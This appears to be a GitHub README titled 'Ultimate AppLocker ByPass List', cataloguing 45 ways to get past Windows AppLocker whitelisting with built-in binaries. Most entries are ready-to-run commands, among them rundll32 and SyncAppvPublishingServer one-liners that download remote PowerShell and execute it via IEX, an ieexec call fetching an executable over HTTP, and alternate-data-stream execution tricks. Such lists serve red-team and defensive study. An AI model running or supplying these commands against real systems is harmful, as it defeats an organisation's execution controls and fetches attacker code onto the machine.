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The goal of this repository is to document the most common techniques to bypass AppLocker.

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Ultimate AppLocker ByPass List

The goal of this repository is to document the most common techniques to bypass AppLocker. This README file contains a complete list of all known bypasses. Since AppLocker can be configured in different ways it makes sense to have master list of bypasses. This README.MD will be the master and will be updated with known and possible AppLocker bypasses.

I have created a list of verified bypasses that works against the default rules created with AppLocker.

For details on how I verified and how to create the default rules you can check my blog:


Please contribute and do point out errors or resources I have forgotten.

1. Rundll32.exe

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");\"calc\");window.close()");

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:")

rundll32 shell32.dll,Control_RunDLL payload.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

2. Regsvr32.exe

regsvr32 /s /n /u /i: scrobj.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

3. Msbuild.exe

msbuild.exe pshell.xml

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


4. Regsvcs.exe

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


5. Regasm.exe

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

  • Requires admin: /U does not require admin
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


6. Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: No

Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.

7. InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


8. MSDT.exe

Open .diagcab package

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


9. mshta.exe

mshta.exe evilfile.hta

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


10. Execute .Bat

cmd.exe /k < script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No


11. Execute .PS1

Get-Content script.txt | iex

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No


12. Execute .VBS

cscript.exe //E:vbscript script.txt

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: No


13. PresentationHost.exe

Missing Example

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


14. dfsvc.exe

Missing Example

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


15. IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


16. cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


17. dnx.exe

dnx.exe consoleapp

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


18. rcsi.exe

rcsi.exe bypass.csx

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


19. csi.exe

Missing example

  • Requires admin: ?
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


20. CPL loading location manipulation


  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


21. msxsl.exe

msxsl.exe customers.xml script.xsl

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


22. msiexec.exe

msiexec /quiet /i cmd.msi msiexec /q /i

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


23. cmstp.exe

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Can also execute scriptlets -

24. xwizard.exe

xwizard.exe argument1 argument2 DLL loading in same folder xwizard.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


25. fsi.exe

fsi.exe c:\folder\d.fscript

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?


26. odbcconf.exe

odbcconf -f file.rsp

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


27. te.exe

te.exe bypass.wsc

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: Can be used if the Test Authoring and Execution Framework is installed and is in a path that is whitelisted. Default location is: C:\program files (x86)\Windows Kits\10\testing\Runtimes\TAEF

28. Placing files in writeable paths under c:\windows

The following folders are by default writable and executable by normal users C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color C:\Windows\Tasks C:\windows\tracing

  • Requires admin: No
  • Windows binary: N/A
  • Bypasses AppLocker Default rules: ?

Notes: This list is based on Windows 10 1709. Run accesschk to verify on other Windows versions

29. Atbroker.exe

ATBroker.exe /start malware

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


30. WMIC.exe

wmic process call create calc

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


31. MavInject32.exe


  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


32. Pubprn.vbs

pubprn.vbs script:

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


33. slmgr.vbs


  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires registry keys for com object.

34. winrm.vbs

winrm quickconfig

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires registry keys for com object.

35. forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


36. SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


37. InfDefaultInstall.exe

InfDefaultInstall.exe shady.inf

  • Requires admin: ?
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Only works on Windows 7? Windows 10 requires admin or digital signature

38. Winword.exe

winword.exe /l dllfile.dll

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: No commonly made DLL example file

39. Runscripthelper.exe

runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?


40. Tracker.exe

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe

  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: Part of Visual studio. Requires TrackerUI.dll present in 1028 subfolder.

41. .WSF files


  • Requires admin: No
  • Windows binary: No
  • Bypasses AppLocker Default rules: ?

Notes: .WSF files are supposed to not be blocked by AppLocker

  • Links:

42. PowerShell version 2

Powershell -version 2

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Bypasses Constrained language mode

  • Links:

43. CL_Invocation.ps1

. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 SyncInvoke <executable> [args]

  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes, as long as PowerShell version 2 is present

Notes: Requires PowerShell version 2

44. Incorrect permissions on files in folders

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: Yes


45. Control.exe -Loading DLL/CPL binary from Alternate data stream

type notepad_reflective_x64.dll > c:\windows\tasks\zzz:notepad_reflective_x64.dll
control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
  • Requires admin: No
  • Windows binary: Yes
  • Bypasses AppLocker Default rules: ?

Notes: Requires write access to a place that is allowed by AppLocker


The goal of this repository is to document the most common techniques to bypass AppLocker.






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